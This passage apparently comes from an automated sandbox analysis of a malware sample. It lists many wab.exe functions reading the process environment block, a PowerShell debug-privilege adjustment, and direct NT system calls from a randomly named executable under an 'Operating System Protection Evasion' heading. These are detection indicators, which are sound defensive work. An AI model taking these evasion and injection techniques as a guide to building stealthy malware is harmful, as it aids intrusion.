        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23312755 mov eax, dword ptr fs:[00000030h]12_2_23312755
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23312755 mov eax, dword ptr fs:[00000030h]12_2_23312755
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2339E750 mov eax, dword ptr fs:[00000030h]12_2_2339E750
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23323740 mov eax, dword ptr fs:[00000030h]12_2_23323740
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232EF75B mov eax, dword ptr fs:[00000030h]12_2_232EF75B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232EF75B mov eax, dword ptr fs:[00000030h]12_2_232EF75B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232EF75B mov eax, dword ptr fs:[00000030h]12_2_232EF75B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232EF75B mov eax, dword ptr fs:[00000030h]12_2_232EF75B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232EF75B mov eax, dword ptr fs:[00000030h]12_2_232EF75B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232EF75B mov eax, dword ptr fs:[00000030h]12_2_232EF75B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232EF75B mov eax, dword ptr fs:[00000030h]12_2_232EF75B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232EF75B mov eax, dword ptr fs:[00000030h]12_2_232EF75B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232EF75B mov eax, dword ptr fs:[00000030h]12_2_232EF75B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2332174A mov eax, dword ptr fs:[00000030h]12_2_2332174A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233C17BC mov eax, dword ptr fs:[00000030h]12_2_233C17BC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232F07A7 mov eax, dword ptr fs:[00000030h]12_2_232F07A7
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233BD7A7 mov eax, dword ptr fs:[00000030h]12_2_233BD7A7
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233BD7A7 mov eax, dword ptr fs:[00000030h]12_2_233BD7A7
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233BD7A7 mov eax, dword ptr fs:[00000030h]12_2_233BD7A7
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23321796 mov eax, dword ptr fs:[00000030h]12_2_23321796
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23321796 mov eax, dword ptr fs:[00000030h]12_2_23321796
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2336E79D mov eax, dword ptr fs:[00000030h]12_2_2336E79D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2336E79D mov eax, dword ptr fs:[00000030h]12_2_2336E79D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2336E79D mov eax, dword ptr fs:[00000030h]12_2_2336E79D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2336E79D mov eax, dword ptr fs:[00000030h]12_2_2336E79D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2336E79D mov eax, dword ptr fs:[00000030h]12_2_2336E79D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2336E79D mov eax, dword ptr fs:[00000030h]12_2_2336E79D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2336E79D mov eax, dword ptr fs:[00000030h]12_2_2336E79D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2336E79D mov eax, dword ptr fs:[00000030h]12_2_2336E79D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2336E79D mov eax, dword ptr fs:[00000030h]12_2_2336E79D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233CB781 mov eax, dword ptr fs:[00000030h]12_2_233CB781
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233CB781 mov eax, dword ptr fs:[00000030h]12_2_233CB781
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232F37E4 mov eax, dword ptr fs:[00000030h]12_2_232F37E4
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232F37E4 mov eax, dword ptr fs:[00000030h]12_2_232F37E4
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232F37E4 mov eax, dword ptr fs:[00000030h]12_2_232F37E4
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232F37E4 mov eax, dword ptr fs:[00000030h]12_2_232F37E4
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232F37E4 mov eax, dword ptr fs:[00000030h]12_2_232F37E4
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232F37E4 mov eax, dword ptr fs:[00000030h]12_2_232F37E4
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232F37E4 mov eax, dword ptr fs:[00000030h]12_2_232F37E4
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2331E7E0 mov eax, dword ptr fs:[00000030h]12_2_2331E7E0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232F77F9 mov eax, dword ptr fs:[00000030h]12_2_232F77F9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232F77F9 mov eax, dword ptr fs:[00000030h]12_2_232F77F9
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233AF7CF mov eax, dword ptr fs:[00000030h]12_2_233AF7CF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23320630 mov eax, dword ptr fs:[00000030h]12_2_23320630
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23378633 mov esi, dword ptr fs:[00000030h]12_2_23378633
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23378633 mov eax, dword ptr fs:[00000030h]12_2_23378633
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23378633 mov eax, dword ptr fs:[00000030h]12_2_23378633
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232F7623 mov eax, dword ptr fs:[00000030h]12_2_232F7623
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232F5622 mov eax, dword ptr fs:[00000030h]12_2_232F5622
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232F5622 mov eax, dword ptr fs:[00000030h]12_2_232F5622
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2339D62C mov ecx, dword ptr fs:[00000030h]12_2_2339D62C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2339D62C mov ecx, dword ptr fs:[00000030h]12_2_2339D62C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2339D62C mov eax, dword ptr fs:[00000030h]12_2_2339D62C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232F0630 mov eax, dword ptr fs:[00000030h]12_2_232F0630
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23383608 mov eax, dword ptr fs:[00000030h]12_2_23383608
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23383608 mov eax, dword ptr fs:[00000030h]12_2_23383608
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23383608 mov eax, dword ptr fs:[00000030h]12_2_23383608
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23383608 mov eax, dword ptr fs:[00000030h]12_2_23383608
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23383608 mov eax, dword ptr fs:[00000030h]12_2_23383608
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23383608 mov eax, dword ptr fs:[00000030h]12_2_23383608
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2331D600 mov eax, dword ptr fs:[00000030h]12_2_2331D600
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2331D600 mov eax, dword ptr fs:[00000030h]12_2_2331D600
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233C4600 mov eax, dword ptr fs:[00000030h]12_2_233C4600
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233AF607 mov eax, dword ptr fs:[00000030h]12_2_233AF607
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2332360F mov eax, dword ptr fs:[00000030h]12_2_2332360F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23332670 mov eax, dword ptr fs:[00000030h]12_2_23332670
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23332670 mov eax, dword ptr fs:[00000030h]12_2_23332670
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232E7662 mov eax, dword ptr fs:[00000030h]12_2_232E7662
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232E7662 mov eax, dword ptr fs:[00000030h]12_2_232E7662
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232E7662 mov eax, dword ptr fs:[00000030h]12_2_232E7662
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23303660 mov eax, dword ptr fs:[00000030h]12_2_23303660
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23303660 mov eax, dword ptr fs:[00000030h]12_2_23303660
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23303660 mov eax, dword ptr fs:[00000030h]12_2_23303660
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232F0670 mov eax, dword ptr fs:[00000030h]12_2_232F0670
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2332666D mov esi, dword ptr fs:[00000030h]12_2_2332666D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2332666D mov eax, dword ptr fs:[00000030h]12_2_2332666D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2332666D mov eax, dword ptr fs:[00000030h]12_2_2332666D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232ED64A mov eax, dword ptr fs:[00000030h]12_2_232ED64A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232ED64A mov eax, dword ptr fs:[00000030h]12_2_232ED64A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23325654 mov eax, dword ptr fs:[00000030h]12_2_23325654
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2332265C mov eax, dword ptr fs:[00000030h]12_2_2332265C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2332265C mov ecx, dword ptr fs:[00000030h]12_2_2332265C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2332265C mov eax, dword ptr fs:[00000030h]12_2_2332265C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232F3640 mov eax, dword ptr fs:[00000030h]12_2_232F3640
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2330F640 mov eax, dword ptr fs:[00000030h]12_2_2330F640
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2330F640 mov eax, dword ptr fs:[00000030h]12_2_2330F640
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2330F640 mov eax, dword ptr fs:[00000030h]12_2_2330F640
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2332C640 mov eax, dword ptr fs:[00000030h]12_2_2332C640
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2332C640 mov eax, dword ptr fs:[00000030h]12_2_2332C640
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232F965A mov eax, dword ptr fs:[00000030h]12_2_232F965A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232F965A mov eax, dword ptr fs:[00000030h]12_2_232F965A
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233B86A8 mov eax, dword ptr fs:[00000030h]12_2_233B86A8
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233B86A8 mov eax, dword ptr fs:[00000030h]12_2_233B86A8
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2337C691 mov eax, dword ptr fs:[00000030h]12_2_2337C691
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23300680 mov eax, dword ptr fs:[00000030h]12_2_23300680
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23300680 mov eax, dword ptr fs:[00000030h]12_2_23300680
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23300680 mov eax, dword ptr fs:[00000030h]12_2_23300680
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23300680 mov eax, dword ptr fs:[00000030h]12_2_23300680
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23300680 mov eax, dword ptr fs:[00000030h]12_2_23300680
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23300680 mov eax, dword ptr fs:[00000030h]12_2_23300680
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23300680 mov eax, dword ptr fs:[00000030h]12_2_23300680
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23300680 mov eax, dword ptr fs:[00000030h]12_2_23300680
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23300680 mov eax, dword ptr fs:[00000030h]12_2_23300680
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23300680 mov eax, dword ptr fs:[00000030h]12_2_23300680
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23300680 mov eax, dword ptr fs:[00000030h]12_2_23300680
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23300680 mov eax, dword ptr fs:[00000030h]12_2_23300680
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233AF68C mov eax, dword ptr fs:[00000030h]12_2_233AF68C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232F8690 mov eax, dword ptr fs:[00000030h]12_2_232F8690
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2336C6F2 mov eax, dword ptr fs:[00000030h]12_2_2336C6F2
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2336C6F2 mov eax, dword ptr fs:[00000030h]12_2_2336C6F2
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232E96E0 mov eax, dword ptr fs:[00000030h]12_2_232E96E0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232E96E0 mov eax, dword ptr fs:[00000030h]12_2_232E96E0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232FC6E0 mov eax, dword ptr fs:[00000030h]12_2_232FC6E0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232F56E0 mov eax, dword ptr fs:[00000030h]12_2_232F56E0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232F56E0 mov eax, dword ptr fs:[00000030h]12_2_232F56E0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232F56E0 mov eax, dword ptr fs:[00000030h]12_2_232F56E0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233166E0 mov eax, dword ptr fs:[00000030h]12_2_233166E0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233166E0 mov eax, dword ptr fs:[00000030h]12_2_233166E0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232F06CF mov eax, dword ptr fs:[00000030h]12_2_232F06CF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2331D6D0 mov eax, dword ptr fs:[00000030h]12_2_2331D6D0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233BA6C0 mov eax, dword ptr fs:[00000030h]12_2_233BA6C0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233986C2 mov eax, dword ptr fs:[00000030h]12_2_233986C2
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23332539 mov eax, dword ptr fs:[00000030h]12_2_23332539
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232E753F mov eax, dword ptr fs:[00000030h]12_2_232E753F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232E753F mov eax, dword ptr fs:[00000030h]12_2_232E753F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232E753F mov eax, dword ptr fs:[00000030h]12_2_232E753F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23321527 mov eax, dword ptr fs:[00000030h]12_2_23321527
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232F3536 mov eax, dword ptr fs:[00000030h]12_2_232F3536
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232F3536 mov eax, dword ptr fs:[00000030h]12_2_232F3536
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2330252B mov eax, dword ptr fs:[00000030h]12_2_2330252B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2330252B mov eax, dword ptr fs:[00000030h]12_2_2330252B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2330252B mov eax, dword ptr fs:[00000030h]12_2_2330252B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2330252B mov eax, dword ptr fs:[00000030h]12_2_2330252B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2330252B mov eax, dword ptr fs:[00000030h]12_2_2330252B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2330252B mov eax, dword ptr fs:[00000030h]12_2_2330252B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2330252B mov eax, dword ptr fs:[00000030h]12_2_2330252B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2339F51B mov eax, dword ptr fs:[00000030h]12_2_2339F51B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2339F51B mov eax, dword ptr fs:[00000030h]12_2_2339F51B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2339F51B mov eax, dword ptr fs:[00000030h]12_2_2339F51B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2339F51B mov eax, dword ptr fs:[00000030h]12_2_2339F51B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2339F51B mov eax, dword ptr fs:[00000030h]12_2_2339F51B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2339F51B mov eax, dword ptr fs:[00000030h]12_2_2339F51B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2339F51B mov ecx, dword ptr fs:[00000030h]12_2_2339F51B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2339F51B mov ecx, dword ptr fs:[00000030h]12_2_2339F51B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2339F51B mov eax, dword ptr fs:[00000030h]12_2_2339F51B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2339F51B mov eax, dword ptr fs:[00000030h]12_2_2339F51B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2339F51B mov eax, dword ptr fs:[00000030h]12_2_2339F51B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2339F51B mov eax, dword ptr fs:[00000030h]12_2_2339F51B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2339F51B mov eax, dword ptr fs:[00000030h]12_2_2339F51B
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23311514 mov eax, dword ptr fs:[00000030h]12_2_23311514
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23311514 mov eax, dword ptr fs:[00000030h]12_2_23311514
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23311514 mov eax, dword ptr fs:[00000030h]12_2_23311514
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23311514 mov eax, dword ptr fs:[00000030h]12_2_23311514
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23311514 mov eax, dword ptr fs:[00000030h]12_2_23311514
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23311514 mov eax, dword ptr fs:[00000030h]12_2_23311514
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2337C51D mov eax, dword ptr fs:[00000030h]12_2_2337C51D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232EB502 mov eax, dword ptr fs:[00000030h]12_2_232EB502
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232F2500 mov eax, dword ptr fs:[00000030h]12_2_232F2500
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2331E507 mov eax, dword ptr fs:[00000030h]12_2_2331E507
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2331E507 mov eax, dword ptr fs:[00000030h]12_2_2331E507
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2331E507 mov eax, dword ptr fs:[00000030h]12_2_2331E507
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2331E507 mov eax, dword ptr fs:[00000030h]12_2_2331E507
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2331E507 mov eax, dword ptr fs:[00000030h]12_2_2331E507
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2331E507 mov eax, dword ptr fs:[00000030h]12_2_2331E507
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2331E507 mov eax, dword ptr fs:[00000030h]12_2_2331E507
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2331E507 mov eax, dword ptr fs:[00000030h]12_2_2331E507
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2332C50D mov eax, dword ptr fs:[00000030h]12_2_2332C50D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2332C50D mov eax, dword ptr fs:[00000030h]12_2_2332C50D
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2330C560 mov eax, dword ptr fs:[00000030h]12_2_2330C560
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233CB55F mov eax, dword ptr fs:[00000030h]12_2_233CB55F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233CB55F mov eax, dword ptr fs:[00000030h]12_2_233CB55F
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232F254C mov eax, dword ptr fs:[00000030h]12_2_232F254C
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233BA553 mov eax, dword ptr fs:[00000030h]12_2_233BA553
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23326540 mov eax, dword ptr fs:[00000030h]12_2_23326540
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2330E547 mov eax, dword ptr fs:[00000030h]12_2_2330E547
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233785AA mov eax, dword ptr fs:[00000030h]12_2_233785AA
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232F45B0 mov eax, dword ptr fs:[00000030h]12_2_232F45B0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232F45B0 mov eax, dword ptr fs:[00000030h]12_2_232F45B0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_23322594 mov eax, dword ptr fs:[00000030h]12_2_23322594
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2332A580 mov eax, dword ptr fs:[00000030h]12_2_2332A580
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2332A580 mov eax, dword ptr fs:[00000030h]12_2_2332A580
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233AF582 mov eax, dword ptr fs:[00000030h]12_2_233AF582
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2336E588 mov eax, dword ptr fs:[00000030h]12_2_2336E588
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2336E588 mov eax, dword ptr fs:[00000030h]12_2_2336E588
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2337C5FC mov eax, dword ptr fs:[00000030h]12_2_2337C5FC
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232FB5E0 mov eax, dword ptr fs:[00000030h]12_2_232FB5E0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232FB5E0 mov eax, dword ptr fs:[00000030h]12_2_232FB5E0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232FB5E0 mov eax, dword ptr fs:[00000030h]12_2_232FB5E0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232FB5E0 mov eax, dword ptr fs:[00000030h]12_2_232FB5E0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232FB5E0 mov eax, dword ptr fs:[00000030h]12_2_232FB5E0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232FB5E0 mov eax, dword ptr fs:[00000030h]12_2_232FB5E0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2332A5E7 mov ebx, dword ptr fs:[00000030h]12_2_2332A5E7
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_2332A5E7 mov eax, dword ptr fs:[00000030h]12_2_2332A5E7
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233215EF mov eax, dword ptr fs:[00000030h]12_2_233215EF
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_233265D0 mov eax, dword ptr fs:[00000030h]12_2_233265D0
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232EF5C7 mov eax, dword ptr fs:[00000030h]12_2_232EF5C7
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232EF5C7 mov eax, dword ptr fs:[00000030h]12_2_232EF5C7
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232EF5C7 mov eax, dword ptr fs:[00000030h]12_2_232EF5C7
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232EF5C7 mov eax, dword ptr fs:[00000030h]12_2_232EF5C7
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232EF5C7 mov eax, dword ptr fs:[00000030h]12_2_232EF5C7
        Source: C:\Program Files (x86)\Windows Mail\wab.exeCode function: 12_2_232EF5C7 mov eax, dword ptr fs:[00000030h]12_2_232EF5C7
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior

        HIPS / PFW / Operating System Protection Evasion

        barindex
        Source: C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exeNtProtectVirtualMemory: Direct from: 0x6E6A609Jump to behavior
        Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exeNtSetInformationProcess: Direct from: 0x77A32B7CJump to behavior
        Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exeNtOpenFile: Direct from: 0x77A32CECJump to behavior
        Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exeNtSetInformationThread: Direct from: 0x77A26319Jump to behavior
        Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exeNtQueryInformationToken: Direct from: 0x77A32BCCJump to behavior
        Source: C:\Program Files (x86)\jaHRMeRtobfWsKpFuHFpQhPymURiOXSszhwZGlWopGNKE\TJxNjwSdogTKaRdGyTBETCcxFSSkfL.exeNtAllocateVirtualMemory: Direct from: 0x77A33BBCJump to behavior
